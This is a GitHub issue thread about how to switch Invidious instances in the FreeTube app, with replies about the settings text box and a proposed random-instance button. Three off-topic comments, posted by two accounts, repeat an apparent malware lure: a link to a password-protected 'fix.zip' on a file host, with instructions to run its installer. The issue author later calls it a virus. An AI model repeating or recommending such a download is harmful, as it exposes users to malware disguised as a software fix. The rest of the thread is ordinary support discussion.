### ISSUE TITLE
[Feature Request]: It's unclear how to switch invidious instances.

### ISSUE THREAD

**Issue by hix1000** [FreeTubeApp/FreeTube#5605]
### Guidelines

- [X] I have searched the issue tracker for [open](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aissue+is%3Aclosed) issues that are similar to the feature request I want to file, without success.
- [X] I have searched the [documentation](https://docs.freetubeapp.io/) for information that matches the description of the feature request I want to file, without success.
- [X] This issue contains only one feature request.

### Problem Description

Unclear how to change invidious instances

### Proposed Solution

Add to documentation

### Alternatives Considered

Button to manually switch instances (if it already exists, make it more clear what's it doing)

### Issue Labels

display more information to user

### Additional Information

Or maybe I'm stupid and it's in front of my face lol

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hix1000** [comment]
thx

**Comment by hix1000** [comment]
libssp-0 is undefined
![Screenshot 2024-08-25 205538](https://github.com/user-attachments/assets/ad897e6a-2121-4e06-ac97-3c9089ec9bc8)

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hix1000** [comment]
nice heuristic virus

**Comment by absidue** [comment]
You are looking for the `Current Invidious Instance` text box in the `General Settings`.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KandiPanda** [comment]
It sounds to me like they may be looking for a "Re-Randomize Instance" button? (Basically manually triggering the same random selection process that it does at startup.)

Which actually wouldn't be a terrible thing to have next to the "Current Invidious Instance" input box, it would allow for selecting a different random instance when the currently selected one is having problems, without having to restart FreeTube.

(Yes, you can type an instance in manually, but then you have to look through the list, have at least a vague idea what you're looking at/for, and actually choose one, rather than simply "press button, receive random instance".)

**Comment by hix1000** [comment]
what instance should i use

**Comment by efb4f5ff-1298-471a-8973-3d47447115dc** [comment]
Please explain in more detail why its unclear to you.

**Comment by hix1000** [comment]
It's not clear on _how_ you switch it. It's not in the documentation, either.

**Comment by absidue** [comment]
> It's not clear on _how_ you switch it. It's not in the documentation, either.

Can you please explain what isn't clear about a text box clearly labeled with current Invidious instance that has a link to the list of public Invidious instances directly below it and also auto-completes URLs from that list?

**Comment by Penguin-Guru** [comment]
> It sounds to me like they may be looking for a "Re-Randomize Instance" button? (Basically manually triggering the same random selection process that it does at startup.)
> 
> Which actually wouldn't be a terrible thing to have next to the "Current Invidious Instance" input box, it would allow for selecting a different random instance when the currently selected one is having problems, without having to restart FreeTube.
> 
> (Yes, you can type an instance in manually, but then you have to look through the list, have at least a vague idea what you're looking at/for, and actually choose one, rather than simply "press button, receive random instance".)

This is what I was looking for. If the text box can already auto-complete, I think such a function is worth adding. A keyboard shortcut would be nice too.

---

My guess as to the uncertainty is maybe because there is no button to submit the value in the text box. Some people might wonder if they need to restart the application for the change to take effect or if that would just clear the value they entered.

**Comment by absidue** [comment]
> This is what I was looking for. If the text box can already auto-complete, I think such a function is worth adding.

Not anymore, the only way to use an Invidious instance with FreeTube these days is to host your own as the public instances block API access, which means none of the auto-complete options are useable and a button to pick a random item from a list of zero items would be pointless.

**Comment by Penguin-Guru** [comment]
Got it. That's unfortunate but reasonable. Hopefully the trend changes some day. I suppose it's probably a matter of either bandwidth cost or visibility to upstream blockers.
